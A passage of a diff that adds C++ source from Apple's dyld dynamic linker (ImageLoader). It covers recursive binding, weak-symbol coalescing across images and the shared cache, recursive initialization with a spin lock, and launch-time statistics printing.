makeDataReadOnly(); + } + catch (const char* msg) { + fMadeReadOnly = false; + throw; + } + } +} + + +void ImageLoader::recursiveBindWithAccounting(const LinkContext& context, bool forceLazysBound, bool neverUnload) +{ + this->recursiveBind(context, forceLazysBound, neverUnload, nullptr); + vmAccountingSetSuspended(context, false); +} + +void ImageLoader::recursiveBind(const LinkContext& context, bool forceLazysBound, bool neverUnload, const ImageLoader* parent) +{ + // Normally just non-lazy pointers are bound immediately. + // The exceptions are: + // 1) DYLD_BIND_AT_LAUNCH will cause lazy pointers to be bound immediately + // 2) some API's (e.g. 
RTLD_NOW) can cause lazy pointers to be bound immediately + if ( fState < dyld_image_state_bound ) { + // break cycles + fState = dyld_image_state_bound; + + try { + // bind lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) { + const ImageLoader* reExportParent = nullptr; + if ( libReExported(i) ) + reExportParent = this; + dependentImage->recursiveBind(context, forceLazysBound, neverUnload, reExportParent); + } + } + // bind this image + this->doBind(context, forceLazysBound, parent); + // mark if lazys are also bound + if ( forceLazysBound || this->usablePrebinding(context) ) + fAllLazyPointersBound = true; + // mark as never-unload if requested + if ( neverUnload ) + this->setNeverUnload(); + + context.notifySingle(dyld_image_state_bound, this, NULL); + } + catch (const char* msg) { + // restore state + fState = dyld_image_state_rebased; + CRSetCrashLogMessage2(NULL); + throw; + } + } +} + + + +// These are mangled symbols for all the variants of operator new and delete +// which a main executable can define (non-weak) and override the +// weak-def implementation in the OS. 
+static const char* const sTreatAsWeak[] = { + "__Znwm", "__ZnwmRKSt9nothrow_t", + "__Znam", "__ZnamRKSt9nothrow_t", + "__ZdlPv", "__ZdlPvRKSt9nothrow_t", "__ZdlPvm", + "__ZdaPv", "__ZdaPvRKSt9nothrow_t", "__ZdaPvm", + "__ZnwmSt11align_val_t", "__ZnwmSt11align_val_tRKSt9nothrow_t", + "__ZnamSt11align_val_t", "__ZnamSt11align_val_tRKSt9nothrow_t", + "__ZdlPvSt11align_val_t", "__ZdlPvSt11align_val_tRKSt9nothrow_t", "__ZdlPvmSt11align_val_t", + "__ZdaPvSt11align_val_t", "__ZdaPvSt11align_val_tRKSt9nothrow_t", "__ZdaPvmSt11align_val_t" +}; + +size_t ImageLoader::HashCString::hash(const char* v) { + // FIXME: Use hash when it has the correct visibility markup + return std::hash{}(v); +} + +bool ImageLoader::EqualCString::equal(const char* s1, const char* s2) { + return strcmp(s1, s2) == 0; +} + +void ImageLoader::weakBind(const LinkContext& context) +{ + + if (!context.useNewWeakBind) { + weakBindOld(context); + return; + } + + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind start:\n"); + uint64_t t1 = mach_absolute_time(); + + // get set of ImageLoaders that participate in coalecsing + ImageLoader* imagesNeedingCoalescing[fgImagesRequiringCoalescing]; + unsigned imageIndexes[fgImagesRequiringCoalescing]; + int count = context.getCoalescedImages(imagesNeedingCoalescing, imageIndexes); + + // count how many have not already had weakbinding done + int countNotYetWeakBound = 0; + int countOfImagesWithWeakDefinitionsNotInSharedCache = 0; + for(int i=0; i < count; ++i) { + if ( ! imagesNeedingCoalescing[i]->weakSymbolsBound(imageIndexes[i]) ) + ++countNotYetWeakBound; + if ( ! 
imagesNeedingCoalescing[i]->inSharedCache() ) + ++countOfImagesWithWeakDefinitionsNotInSharedCache; + } + + // don't need to do any coalescing if only one image has overrides, or all have already been done + if ( (countOfImagesWithWeakDefinitionsNotInSharedCache > 0) && (countNotYetWeakBound > 0) ) { + if (!context.weakDefMapInitialized) { + // Initialize the weak def map as the link context doesn't run static initializers + new (&context.weakDefMap) dyld3::Map, ImageLoader::HashCString, ImageLoader::EqualCString>(); + context.weakDefMapInitialized = true; + } + + // We might have to patch the shared cache __DATA_CONST. In that case, we'll create just a single + // patcher when needed. + DyldSharedCache::DataConstLazyScopedWriter patcher(context.dyldCache, mach_task_self(), context.verboseMapping ? &dyld::log : nullptr); + +#if TARGET_OS_OSX + // only do alternate algorithm for dlopen(). Use traditional algorithm for launch + if ( !context.linkingMainExecutable ) { + // Don't take the memory hit of weak defs on the launch path until we hit a dlopen with more weak symbols to bind + if (!context.weakDefMapProcessedLaunchDefs) { + context.weakDefMapProcessedLaunchDefs = true; + + // Walk the nlist for all binaries from launch and fill in the map with any other weak defs + for (int i=0; i < count; ++i) { + const ImageLoader* image = imagesNeedingCoalescing[i]; + // skip images without defs. 
We've processed launch time refs already + if ( !image->hasCoalescedExports() ) + continue; + // Only process binaries which have had their weak symbols bound, ie, not the new ones we are processing now + // from this dlopen + if ( !image->weakSymbolsBound(imageIndexes[i]) ) + continue; + + Diagnostics diag; + const dyld3::MachOAnalyzer* ma = (const dyld3::MachOAnalyzer*)image->machHeader(); + ma->forEachWeakDef(diag, ^(const char *symbolName, uint64_t imageOffset, bool isFromExportTrie) { + uintptr_t targetAddr = (uintptr_t)ma + (uintptr_t)imageOffset; + if ( isFromExportTrie ) { + // Avoid duplicating the string if we already have the symbol name + if ( context.weakDefMap.find(symbolName) != context.weakDefMap.end() ) + return; + symbolName = strdup(symbolName); + } + context.weakDefMap.insert({ symbolName, { image, targetAddr } }); + }); + } + } + + // Walk the nlist for all binaries in dlopen and fill in the map with any other weak defs + for (int i=0; i < count; ++i) { + const ImageLoader* image = imagesNeedingCoalescing[i]; + if ( image->weakSymbolsBound(imageIndexes[i]) ) + continue; + // skip images without defs. 
We'll process refs later + if ( !image->hasCoalescedExports() ) + continue; + Diagnostics diag; + const dyld3::MachOAnalyzer* ma = (const dyld3::MachOAnalyzer*)image->machHeader(); + ma->forEachWeakDef(diag, ^(const char *symbolName, uint64_t imageOffset, bool isFromExportTrie) { + uintptr_t targetAddr = (uintptr_t)ma + (uintptr_t)imageOffset; + if ( isFromExportTrie ) { + // Avoid duplicating the string if we already have the symbol name + if ( context.weakDefMap.find(symbolName) != context.weakDefMap.end() ) + return; + symbolName = strdup(symbolName); + } + context.weakDefMap.insert({ symbolName, { image, targetAddr } }); + }); + } + // for all images that need weak binding + for (int i=0; i < count; ++i) { + ImageLoader* imageBeingFixedUp = imagesNeedingCoalescing[i]; + if ( imageBeingFixedUp->weakSymbolsBound(imageIndexes[i]) ) + continue; // weak binding already completed + bool imageBeingFixedUpInCache = imageBeingFixedUp->inSharedCache(); + + if ( context.verboseWeakBind ) + dyld::log("dyld: checking for weak symbols in %s\n", imageBeingFixedUp->getPath()); + // for all symbols that need weak binding in this image + ImageLoader::CoalIterator coalIterator; + imageBeingFixedUp->initializeCoalIterator(coalIterator, i, imageIndexes[i]); + while ( !imageBeingFixedUp->incrementCoalIterator(coalIterator) ) { + const char* nameToCoalesce = coalIterator.symbolName; + uintptr_t targetAddr = 0; + const ImageLoader* targetImage; + // Seatch the map for a previous definition to use + auto weakDefIt = context.weakDefMap.find(nameToCoalesce); + if ( (weakDefIt != context.weakDefMap.end()) && (weakDefIt->second.first != nullptr) ) { + // Found a previous defition + targetImage = weakDefIt->second.first; + targetAddr = weakDefIt->second.second; + } else { + // scan all images looking for definition to use + for (int j=0; j < count; ++j) { + const ImageLoader* anImage = imagesNeedingCoalescing[j]; + bool anImageInCache = anImage->inSharedCache(); + // Don't look at images in 
dyld cache because cache is + // already coalesced. Only images outside cache can potentially override something in cache. + if ( anImageInCache && imageBeingFixedUpInCache ) + continue; + + //dyld::log("looking for %s in %s\n", nameToCoalesce, anImage->getPath()); + const ImageLoader* foundIn; + const Symbol* sym = anImage->findExportedSymbol(nameToCoalesce, false, &foundIn); + if ( sym != NULL ) { + targetAddr = foundIn->getExportedSymbolAddress(sym, context); + targetImage = foundIn; + if ( context.verboseWeakBind ) + dyld::log("dyld: found weak %s at 0x%lX in %s\n", nameToCoalesce, targetAddr, foundIn->getPath()); + break; + } + } + } + if ( (targetAddr != 0) && (coalIterator.image != targetImage) ) { + if ( coalIterator.image->inSharedCache() ) + patcher.makeWriteable(); + coalIterator.image->updateUsesCoalIterator(coalIterator, targetAddr, (ImageLoader*)targetImage, 0, context); + if (weakDefIt == context.weakDefMap.end()) { + if (targetImage->neverUnload()) { + // Add never unload defs to the map for next time + context.weakDefMap.insert({ nameToCoalesce, { targetImage, targetAddr } }); + if ( context.verboseWeakBind ) { + dyld::log("dyld: weak binding adding %s to map\n", nameToCoalesce); + } + } else { + // Add a placeholder for unloadable symbols which makes us fall back to the regular search + context.weakDefMap.insert({ nameToCoalesce, { targetImage, targetAddr } }); + if ( context.verboseWeakBind ) { + dyld::log("dyld: weak binding adding unloadable placeholder %s to map\n", nameToCoalesce); + } + } + } + if ( context.verboseWeakBind ) + dyld::log("dyld: adjusting uses of %s in %s to use definition from %s\n", nameToCoalesce, coalIterator.image->getPath(), targetImage->getPath()); + } + } + imageBeingFixedUp->setWeakSymbolsBound(imageIndexes[i]); + } + } + else +#endif // TARGET_OS_OSX + { + // make symbol iterators for each + ImageLoader::CoalIterator iterators[count]; + ImageLoader::CoalIterator* sortedIts[count]; + for(int i=0; i < count; ++i) { + 
imagesNeedingCoalescing[i]->initializeCoalIterator(iterators[i], i, imageIndexes[i]); + sortedIts[i] = &iterators[i]; + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind load order %d/%d for %s\n", i, count, imagesNeedingCoalescing[i]->getIndexedPath(imageIndexes[i])); + } + + // walk all symbols keeping iterators in sync by + // only ever incrementing the iterator with the lowest symbol + int doneCount = 0; + while ( doneCount != count ) { + //for(int i=0; i < count; ++i) + // dyld::log("sym[%d]=%s ", sortedIts[i]->loadOrder, sortedIts[i]->symbolName); + //dyld::log("\n"); + // increment iterator with lowest symbol + if ( sortedIts[0]->image->incrementCoalIterator(*sortedIts[0]) ) + ++doneCount; + // re-sort iterators + for(int i=1; i < count; ++i) { + int result = strcmp(sortedIts[i-1]->symbolName, sortedIts[i]->symbolName); + if ( result == 0 ) + sortedIts[i-1]->symbolMatches = true; + if ( result > 0 ) { + // new one is bigger then next, so swap + ImageLoader::CoalIterator* temp = sortedIts[i-1]; + sortedIts[i-1] = sortedIts[i]; + sortedIts[i] = temp; + } + if ( result < 0 ) + break; + } + // process all matching symbols just before incrementing the lowest one that matches + if ( sortedIts[0]->symbolMatches && !sortedIts[0]->done ) { + const char* nameToCoalesce = sortedIts[0]->symbolName; + // pick first symbol in load order (and non-weak overrides weak) + uintptr_t targetAddr = 0; + ImageLoader* targetImage = NULL; + unsigned targetImageIndex = 0; + for(int i=0; i < count; ++i) { + if ( strcmp(iterators[i].symbolName, nameToCoalesce) == 0 ) { + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind, found %s weak=%d in %s \n", nameToCoalesce, iterators[i].weakSymbol, iterators[i].image->getIndexedPath((unsigned)iterators[i].imageIndex)); + if ( iterators[i].weakSymbol ) { + if ( targetAddr == 0 ) { + targetAddr = iterators[i].image->getAddressCoalIterator(iterators[i], context); + if ( targetAddr != 0 ) { + targetImage = iterators[i].image; + 
targetImageIndex = (unsigned)iterators[i].imageIndex; + } + } + } + else { + targetAddr = iterators[i].image->getAddressCoalIterator(iterators[i], context); + if ( targetAddr != 0 ) { + targetImage = iterators[i].image; + targetImageIndex = (unsigned)iterators[i].imageIndex; + // strong implementation found, stop searching + break; + } + } + } + } + // tell each to bind to this symbol (unless already bound) + if ( targetAddr != 0 ) { + if ( context.verboseWeakBind ) { + dyld::log("dyld: weak binding all uses of %s to copy from %s\n", + nameToCoalesce, targetImage->getIndexedShortName(targetImageIndex)); + } + for(int i=0; i < count; ++i) { + if ( strcmp(iterators[i].symbolName, nameToCoalesce) == 0 ) { + if ( context.verboseWeakBind ) { + dyld::log("dyld: weak bind, setting all uses of %s in %s to 0x%lX from %s\n", + nameToCoalesce, iterators[i].image->getIndexedShortName((unsigned)iterators[i].imageIndex), + targetAddr, targetImage->getIndexedShortName(targetImageIndex)); + } + if ( ! iterators[i].image->weakSymbolsBound(imageIndexes[i]) ) { + if ( iterators[i].image->inSharedCache() ) + patcher.makeWriteable(); + iterators[i].image->updateUsesCoalIterator(iterators[i], targetAddr, targetImage, targetImageIndex, context); + } + iterators[i].symbolMatches = false; + } + } + if (targetImage->neverUnload()) { + // Add never unload defs to the map for next time + context.weakDefMap.insert({ nameToCoalesce, { targetImage, targetAddr } }); + if ( context.verboseWeakBind ) { + dyld::log("dyld: weak binding adding %s to map\n", + nameToCoalesce); + } + } + } + + } + } + + for (int i=0; i < count; ++i) { + if ( imagesNeedingCoalescing[i]->weakSymbolsBound(imageIndexes[i]) ) + continue; // skip images already processed + + if ( imagesNeedingCoalescing[i]->usesChainedFixups() ) { + // during binding of references to weak-def symbols, the dyld cache was patched + // but if main executable has non-weak override of operator new or delete it needs is handled here + for (const 
char* weakSymbolName : sTreatAsWeak) { + const ImageLoader* dummy; + imagesNeedingCoalescing[i]->resolveWeak(context, weakSymbolName, true, false, &dummy, patcher); + } + } +#if __arm64e__ + else { + // support traditional arm64 app on an arm64e device + // look for weak def symbols in this image which may override the cache + ImageLoader::CoalIterator coaler; + imagesNeedingCoalescing[i]->initializeCoalIterator(coaler, i, 0); + imagesNeedingCoalescing[i]->incrementCoalIterator(coaler); + while ( !coaler.done ) { + const ImageLoader* dummy; + // a side effect of resolveWeak() is to patch cache + imagesNeedingCoalescing[i]->resolveWeak(context, coaler.symbolName, true, false, &dummy, patcher); + imagesNeedingCoalescing[i]->incrementCoalIterator(coaler); + } + } +#endif + } + + // mark all as having all weak symbols bound + for(int i=0; i < count; ++i) { + imagesNeedingCoalescing[i]->setWeakSymbolsBound(imageIndexes[i]); + } + } + } + + uint64_t t2 = mach_absolute_time(); + fgTotalWeakBindTime += t2 - t1; + + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind end\n"); +} + + +void ImageLoader::weakBindOld(const LinkContext& context) +{ + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind start:\n"); + uint64_t t1 = mach_absolute_time(); + // get set of ImageLoaders that participate in coalecsing + ImageLoader* imagesNeedingCoalescing[fgImagesRequiringCoalescing]; + unsigned imageIndexes[fgImagesRequiringCoalescing]; + int count = context.getCoalescedImages(imagesNeedingCoalescing, imageIndexes); + + // count how many have not already had weakbinding done + int countNotYetWeakBound = 0; + int countOfImagesWithWeakDefinitionsNotInSharedCache = 0; + for(int i=0; i < count; ++i) { + if ( ! imagesNeedingCoalescing[i]->weakSymbolsBound(imageIndexes[i]) ) + ++countNotYetWeakBound; + if ( ! 
imagesNeedingCoalescing[i]->inSharedCache() ) + ++countOfImagesWithWeakDefinitionsNotInSharedCache; + } + + // don't need to do any coalescing if only one image has overrides, or all have already been done + if ( (countOfImagesWithWeakDefinitionsNotInSharedCache > 0) && (countNotYetWeakBound > 0) ) { + // We might have to patch the shared cache __DATA_CONST. In that case, we'll create just a single + // patcher when needed. + DyldSharedCache::DataConstLazyScopedWriter patcher(context.dyldCache, mach_task_self(), context.verboseMapping ? &dyld::log : nullptr); + +#if TARGET_OS_OSX + // only do alternate algorithm for dlopen(). Use traditional algorithm for launch + if ( !context.linkingMainExecutable ) { + // for all images that need weak binding + for (int i=0; i < count; ++i) { + ImageLoader* imageBeingFixedUp = imagesNeedingCoalescing[i]; + if ( imageBeingFixedUp->weakSymbolsBound(imageIndexes[i]) ) + continue; // weak binding already completed + bool imageBeingFixedUpInCache = imageBeingFixedUp->inSharedCache(); + + if ( context.verboseWeakBind ) + dyld::log("dyld: checking for weak symbols in %s\n", imageBeingFixedUp->getPath()); + // for all symbols that need weak binding in this image + ImageLoader::CoalIterator coalIterator; + imageBeingFixedUp->initializeCoalIterator(coalIterator, i, imageIndexes[i]); + while ( !imageBeingFixedUp->incrementCoalIterator(coalIterator) ) { + const char* nameToCoalesce = coalIterator.symbolName; + uintptr_t targetAddr = 0; + const ImageLoader* targetImage; + // scan all images looking for definition to use + for (int j=0; j < count; ++j) { + const ImageLoader* anImage = imagesNeedingCoalescing[j]; + bool anImageInCache = anImage->inSharedCache(); + // Don't look at images in dyld cache because cache is + // already coalesced. Only images outside cache can potentially override something in cache. 
+ if ( anImageInCache && imageBeingFixedUpInCache ) + continue; + + //dyld::log("looking for %s in %s\n", nameToCoalesce, anImage->getPath()); + const ImageLoader* foundIn; + const Symbol* sym = anImage->findExportedSymbol(nameToCoalesce, false, &foundIn); + if ( sym != NULL ) { + if ( (foundIn->getExportedSymbolInfo(sym) & ImageLoader::kWeakDefinition) == 0 ) { + // found non-weak def, use it and stop looking + targetAddr = foundIn->getExportedSymbolAddress(sym, context); + targetImage = foundIn; + if ( context.verboseWeakBind ) + dyld::log("dyld: found strong %s at 0x%lX in %s\n", nameToCoalesce, targetAddr, foundIn->getPath()); + break; + } + else { + // found weak-def, only use if no weak found yet + if ( targetAddr == 0 ) { + targetAddr = foundIn->getExportedSymbolAddress(sym, context); + targetImage = foundIn; + if ( context.verboseWeakBind ) + dyld::log("dyld: found weak %s at 0x%lX in %s\n", nameToCoalesce, targetAddr, foundIn->getPath()); + } + } + } + } + if ( (targetAddr != 0) && (coalIterator.image != targetImage) ) { + if ( coalIterator.image->inSharedCache() ) + patcher.makeWriteable(); + coalIterator.image->updateUsesCoalIterator(coalIterator, targetAddr, (ImageLoader*)targetImage, 0, context); + if ( context.verboseWeakBind ) + dyld::log("dyld: adjusting uses of %s in %s to use definition from %s\n", nameToCoalesce, coalIterator.image->getPath(), targetImage->getPath()); + } + } + imageBeingFixedUp->setWeakSymbolsBound(imageIndexes[i]); + } + } + else +#endif // TARGET_OS_OSX + { + // make symbol iterators for each + ImageLoader::CoalIterator iterators[count]; + ImageLoader::CoalIterator* sortedIts[count]; + for(int i=0; i < count; ++i) { + imagesNeedingCoalescing[i]->initializeCoalIterator(iterators[i], i, imageIndexes[i]); + sortedIts[i] = &iterators[i]; + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind load order %d/%d for %s\n", i, count, imagesNeedingCoalescing[i]->getIndexedPath(imageIndexes[i])); + } + + // walk all symbols 
keeping iterators in sync by + // only ever incrementing the iterator with the lowest symbol + int doneCount = 0; + while ( doneCount != count ) { + //for(int i=0; i < count; ++i) + // dyld::log("sym[%d]=%s ", sortedIts[i]->loadOrder, sortedIts[i]->symbolName); + //dyld::log("\n"); + // increment iterator with lowest symbol + if ( sortedIts[0]->image->incrementCoalIterator(*sortedIts[0]) ) + ++doneCount; + // re-sort iterators + for(int i=1; i < count; ++i) { + int result = strcmp(sortedIts[i-1]->symbolName, sortedIts[i]->symbolName); + if ( result == 0 ) + sortedIts[i-1]->symbolMatches = true; + if ( result > 0 ) { + // new one is bigger then next, so swap + ImageLoader::CoalIterator* temp = sortedIts[i-1]; + sortedIts[i-1] = sortedIts[i]; + sortedIts[i] = temp; + } + if ( result < 0 ) + break; + } + // process all matching symbols just before incrementing the lowest one that matches + if ( sortedIts[0]->symbolMatches && !sortedIts[0]->done ) { + const char* nameToCoalesce = sortedIts[0]->symbolName; + // pick first symbol in load order (and non-weak overrides weak) + uintptr_t targetAddr = 0; + ImageLoader* targetImage = NULL; + unsigned targetImageIndex = 0; + for(int i=0; i < count; ++i) { + if ( strcmp(iterators[i].symbolName, nameToCoalesce) == 0 ) { + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind, found %s weak=%d in %s \n", nameToCoalesce, iterators[i].weakSymbol, iterators[i].image->getIndexedPath((unsigned)iterators[i].imageIndex)); + if ( iterators[i].weakSymbol ) { + if ( targetAddr == 0 ) { + targetAddr = iterators[i].image->getAddressCoalIterator(iterators[i], context); + if ( targetAddr != 0 ) { + targetImage = iterators[i].image; + targetImageIndex = (unsigned)iterators[i].imageIndex; + } + } + } + else { + targetAddr = iterators[i].image->getAddressCoalIterator(iterators[i], context); + if ( targetAddr != 0 ) { + targetImage = iterators[i].image; + targetImageIndex = (unsigned)iterators[i].imageIndex; + // strong implementation found, 
stop searching + break; + } + } + } + } + // tell each to bind to this symbol (unless already bound) + if ( targetAddr != 0 ) { + if ( context.verboseWeakBind ) { + dyld::log("dyld: weak binding all uses of %s to copy from %s\n", + nameToCoalesce, targetImage->getIndexedShortName(targetImageIndex)); + } + for(int i=0; i < count; ++i) { + if ( strcmp(iterators[i].symbolName, nameToCoalesce) == 0 ) { + if ( context.verboseWeakBind ) { + dyld::log("dyld: weak bind, setting all uses of %s in %s to 0x%lX from %s\n", + nameToCoalesce, iterators[i].image->getIndexedShortName((unsigned)iterators[i].imageIndex), + targetAddr, targetImage->getIndexedShortName(targetImageIndex)); + } + if ( ! iterators[i].image->weakSymbolsBound(imageIndexes[i]) ) { + if ( iterators[i].image->inSharedCache() ) + patcher.makeWriteable(); + iterators[i].image->updateUsesCoalIterator(iterators[i], targetAddr, targetImage, targetImageIndex, context); + } + iterators[i].symbolMatches = false; + } + } + } + + } + } + + for (int i=0; i < count; ++i) { + if ( imagesNeedingCoalescing[i]->weakSymbolsBound(imageIndexes[i]) ) + continue; // skip images already processed + + if ( imagesNeedingCoalescing[i]->usesChainedFixups() ) { + // during binding of references to weak-def symbols, the dyld cache was patched + // but if main executable has non-weak override of operator new or delete it needs is handled here + for (const char* weakSymbolName : sTreatAsWeak) { + const ImageLoader* dummy; + imagesNeedingCoalescing[i]->resolveWeak(context, weakSymbolName, true, false, &dummy, patcher); + } + } +#if __arm64e__ + else { + // support traditional arm64 app on an arm64e device + // look for weak def symbols in this image which may override the cache + patcher.makeWriteable(); + ImageLoader::CoalIterator coaler; + imagesNeedingCoalescing[i]->initializeCoalIterator(coaler, i, 0); + imagesNeedingCoalescing[i]->incrementCoalIterator(coaler); + while ( !coaler.done ) { + const ImageLoader* dummy; + // a side effect 
of resolveWeak() is to patch cache + imagesNeedingCoalescing[i]->resolveWeak(context, coaler.symbolName, true, false, &dummy, patcher); + imagesNeedingCoalescing[i]->incrementCoalIterator(coaler); + } + } +#endif + } + + // mark all as having all weak symbols bound + for(int i=0; i < count; ++i) { + imagesNeedingCoalescing[i]->setWeakSymbolsBound(imageIndexes[i]); + } + } + } + + uint64_t t2 = mach_absolute_time(); + fgTotalWeakBindTime += t2 - t1; + + if ( context.verboseWeakBind ) + dyld::log("dyld: weak bind end\n"); +} + + + +void ImageLoader::recursiveGetDOFSections(const LinkContext& context, std::vector& dofs) +{ + if ( ! fRegisteredDOF ) { + // break cycles + fRegisteredDOF = true; + + // gather lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) + dependentImage->recursiveGetDOFSections(context, dofs); + } + this->doGetDOFSections(context, dofs); + } +} + +void ImageLoader::setNeverUnloadRecursive() { + if ( ! fNeverUnload ) { + // break cycles + fNeverUnload = true; + + // gather lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) + dependentImage->setNeverUnloadRecursive(); + } + } +} + +void ImageLoader::recursiveSpinLock(recursive_lock& rlock) +{ + // try to set image's ivar fInitializerRecursiveLock to point to this lock_info + // keep trying until success (spin) +#pragma clang diagnostic push +#pragma clang diagnostic ignored "-Wdeprecated-declarations" + while ( ! 
OSAtomicCompareAndSwapPtrBarrier(NULL, &rlock, (void**)&fInitializerRecursiveLock) ) { + // if fInitializerRecursiveLock already points to a different lock_info, if it is for + // the same thread we are on, the increment the lock count, otherwise continue to spin + if ( (fInitializerRecursiveLock != NULL) && (fInitializerRecursiveLock->thread == rlock.thread) ) + break; + } +#pragma clang diagnostic pop + ++(fInitializerRecursiveLock->count); +} + +void ImageLoader::recursiveSpinUnLock() +{ + if ( --(fInitializerRecursiveLock->count) == 0 ) + fInitializerRecursiveLock = NULL; +} + +void ImageLoader::InitializerTimingList::addTime(const char* name, uint64_t time) +{ + for (int i=0; i < count; ++i) { + if ( strcmp(images[i].shortName, name) == 0 ) { + images[i].initTime += time; + return; + } + } + images[count].initTime = time; + images[count].shortName = name; + ++count; +} + +void ImageLoader::recursiveInitialization(const LinkContext& context, mach_port_t this_thread, const char* pathToInitialize, + InitializerTimingList& timingInfo, UninitedUpwards& uninitUps) +{ + recursive_lock lock_info(this_thread); + recursiveSpinLock(lock_info); + + if ( fState < dyld_image_state_dependents_initialized-1 ) { + uint8_t oldState = fState; + // break cycles + fState = dyld_image_state_dependents_initialized-1; + try { + // initialize lower level libraries first + for(unsigned int i=0; i < libraryCount(); ++i) { + ImageLoader* dependentImage = libImage(i); + if ( dependentImage != NULL ) { + // don't try to initialize stuff "above" me yet + if ( libIsUpward(i) ) { + uninitUps.imagesAndPaths[uninitUps.count] = { dependentImage, libPath(i) }; + uninitUps.count++; + } + else if ( dependentImage->fDepth >= fDepth ) { + dependentImage->recursiveInitialization(context, this_thread, libPath(i), timingInfo, uninitUps); + } + } + } + + // record termination order + if ( this->needsTermination() ) + context.terminationRecorder(this); + + // let objc know we are about to initialize this 
image + uint64_t t1 = mach_absolute_time(); + fState = dyld_image_state_dependents_initialized; + oldState = fState; + context.notifySingle(dyld_image_state_dependents_initialized, this, &timingInfo); + + // initialize this image + bool hasInitializers = this->doInitialization(context); + + // let anyone know we finished initializing this image + fState = dyld_image_state_initialized; + oldState = fState; + context.notifySingle(dyld_image_state_initialized, this, NULL); + + if ( hasInitializers ) { + uint64_t t2 = mach_absolute_time(); + timingInfo.addTime(this->getShortName(), t2-t1); + } + } + catch (const char* msg) { + // this image is not initialized + fState = oldState; + recursiveSpinUnLock(); + throw; + } + } + + recursiveSpinUnLock(); +} + + +static void printTime(const char* msg, uint64_t partTime, uint64_t totalTime) +{ + static uint64_t sUnitsPerSecond = 0; + if ( sUnitsPerSecond == 0 ) { + struct mach_timebase_info timeBaseInfo; + if ( mach_timebase_info(&timeBaseInfo) != KERN_SUCCESS ) + return; + sUnitsPerSecond = 1000000000ULL * timeBaseInfo.denom / timeBaseInfo.numer; + } + if ( partTime < sUnitsPerSecond ) { + uint32_t milliSecondsTimesHundred = (uint32_t)((partTime*100000)/sUnitsPerSecond); + uint32_t milliSeconds = (uint32_t)(milliSecondsTimesHundred/100); + uint32_t percentTimesTen = (uint32_t)((partTime*1000)/totalTime); + uint32_t percent = percentTimesTen/10; + if ( milliSeconds >= 100 ) + dyld::log("%s: %u.%02u milliseconds (%u.%u%%)\n", msg, milliSeconds, milliSecondsTimesHundred-milliSeconds*100, percent, percentTimesTen-percent*10); + else if ( milliSeconds >= 10 ) + dyld::log("%s: %u.%02u milliseconds (%u.%u%%)\n", msg, milliSeconds, milliSecondsTimesHundred-milliSeconds*100, percent, percentTimesTen-percent*10); + else + dyld::log("%s: %u.%02u milliseconds (%u.%u%%)\n", msg, milliSeconds, milliSecondsTimesHundred-milliSeconds*100, percent, percentTimesTen-percent*10); + } + else { + uint32_t secondsTimeTen = 
(uint32_t)((partTime*10)/sUnitsPerSecond); + uint32_t seconds = secondsTimeTen/10; + uint32_t percentTimesTen = (uint32_t)((partTime*1000)/totalTime); + uint32_t percent = percentTimesTen/10; + dyld::log("%s: %u.%u seconds (%u.%u%%)\n", msg, seconds, secondsTimeTen-seconds*10, percent, percentTimesTen-percent*10); + } +} + +static char* commatize(uint64_t in, char* out) +{ + uint64_t div10 = in / 10; + uint8_t delta = in - div10*10; + char* s = &out[32]; + int digitCount = 1; + *s = '\0'; + *(--s) = '0' + delta; + in = div10; + while ( in != 0 ) { + if ( (digitCount % 3) == 0 ) + *(--s) = ','; + div10 = in / 10; + delta = in - div10*10; + *(--s) = '0' + delta; + in = div10; + ++digitCount; + } + return s; +} + + +void ImageLoader::printStatistics(unsigned int imageCount, const InitializerTimingList& timingInfo) +{ + uint64_t totalTime = fgTotalLoadLibrariesTime + fgTotalRebaseTime + fgTotalBindTime + fgTotalWeakBindTime + fgTotalDOF + fgTotalInitTime; + + uint64_t totalDyldTime = totalTime - fgTotalDebuggerPausedTime - fgTotalRebindCacheTime; + printTime("Total pre-main time", totalDyldTime, totalDyldTime); + printTime(" dylib loading time", fgTotalLoadLibrariesTime-fgTotalDebuggerPausedTime, totalDyldTime); + printTime(" rebase/binding time", fgTotalRebaseTime+fgTotalBindTime+fgTotalWeakBindTime-fgTotalRebindCacheTime, totalDyldTime); + printTime(" ObjC setup time", fgTotalObjCSetupTime, totalDyldTime); + printTime(" initializer time", fgTotalInitTime-fgTotalObjCSetupTime, totalDyldTime); + dyld::log(" slowest intializers :\n"); + for (uintptr_t i=0; i < timingInfo.count; ++i) { + uint64_t t = timingInfo.images[i].initTime; + if ( t*50 < totalDyldTime ) + continue; + dyld::log("%30s ", timingInfo.images[i].shortName); + if ( strncmp(timingInfo.images[i].shortName, "libSystem.", 10) == 0 ) + t -= fgTotalObjCSetupTime; + printTime("", t, totalDyldTime); + } + dyld::log("\n"); +} + +void ImageLoader::printStatisticsDetails(unsigned int imageCount, const 
InitializerTimingList& timingInfo) +{ + uint64_t totalTime = fgTotalLoadLibrariesTime + fgTotalRebaseTime + fgTotalBindTime + fgTotalWeakBindTime + fgTotalDOF + fgTotalInitTime; + char commaNum1[40]; + char commaNum2[40]; + + printTime(" total time", totalTime, totalTime); + dyld::log(" total images loaded: %d (%u from dyld shared cache)\n", imageCount, fgImagesUsedFromSharedCache); + dyld::log(" total segments mapped: %u, into %llu pages\n", fgTotalSegmentsMapped, fgTotalBytesMapped/4096); + printTime(" total images loading time", fgTotalLoadLibrariesTime, totalTime); + printTime(" total load time in ObjC", fgTotalObjCSetupTime, totalTime); + printTime(" total debugger pause time", fgTotalDebuggerPausedTime, totalTime); + printTime(" total dtrace DOF registration time", fgTotalDOF, totalTime); + dyld::log(" total rebase fixups: %s\n", commatize(fgTotalRebaseFixups, commaNum1)); + printTime(" total rebase fixups time", fgTotalRebaseTime, totalTime); + dyld::log(" total binding fixups: %s\n", commatize(fgTotalBindFixups, commaNum1)); + if ( fgTotalBindSymbolsResolved != 0 ) { + uint32_t avgTimesTen = 